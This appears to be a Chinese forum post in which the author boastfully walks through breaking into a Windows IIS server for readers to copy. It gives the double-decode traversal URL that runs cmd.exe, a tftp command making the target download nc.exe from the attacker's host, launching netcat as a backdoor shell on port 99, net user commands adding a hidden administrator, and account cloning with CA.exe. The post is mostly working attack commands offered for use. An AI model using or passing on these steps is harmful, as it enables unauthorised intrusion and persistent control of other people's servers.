某晚在榕哥的网站上看到榕哥写的一篇文章,关于客隆administratro的权限.我抱着学习的态度想试一试.果然.成功了..
嘿嘿.榕 哥的东西就是好.再不怎么会有人说他的网站表示着国内的网络安全呢.
以下是我的全部过程.我也不敢自已独吞啊.所以拿出来和大家一起分享喽.
入侵其实和炒菜一样.都得先备好料..反正我是这么理解的.(我可不是厨师哦)以下是我备的料.
GetAccount.exe (榕哥的东西)
CA.exe (也是榕哥的东西
X-way2.5.zip (一个扫描软件)
tftpd32.exe (一个小巧的ftp服务器软件)
nc.exe (一个可以telnet到99端口的东西)
好了.下面开始吧..
第一步.
用X-way2.5扫描xxx.xxx.xxx.xxx发现xxx.xxx.xxx.xxx/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
哈哈.找到了..就这个吧.
第二步
运行tftpd32.运行之后你的机器就是一个ftp服务器了.回到你的浏览器,在地址栏里填入http://xxx.xxx.xxx.xxx/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp -i xxx.xxx.xxx.xxx GET nc.exe c:\\inetpub\\scripts\\nc.exe然后等那么一小会就会传到主机c:\inetpub\scripts\目录了,这时我们要让主机运行nc.exe, xxx.xxx.xxx.xxx/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe
第三步
然后telnet xxx.xxx.xxx.xxx 99 呵呵...进来了吧.
下面我们建一个用户名为daoker口令为daoker的用户.
net user daoker daoker /add
将daoker这个用户加入administrators组
net localgroup administrators daoker /add
第四步
下面利用CA.exe 将daoker克隆为Administrator
ca \\xxx.xxx.xxx.xxx test test daoker password
这时,daoker就成为了超级用户,并有具有和Administrator同样的设置,桌面、菜单等等。
是不是很爽啊.发果要是再开个3389什么的.是不是很爽啊...
end
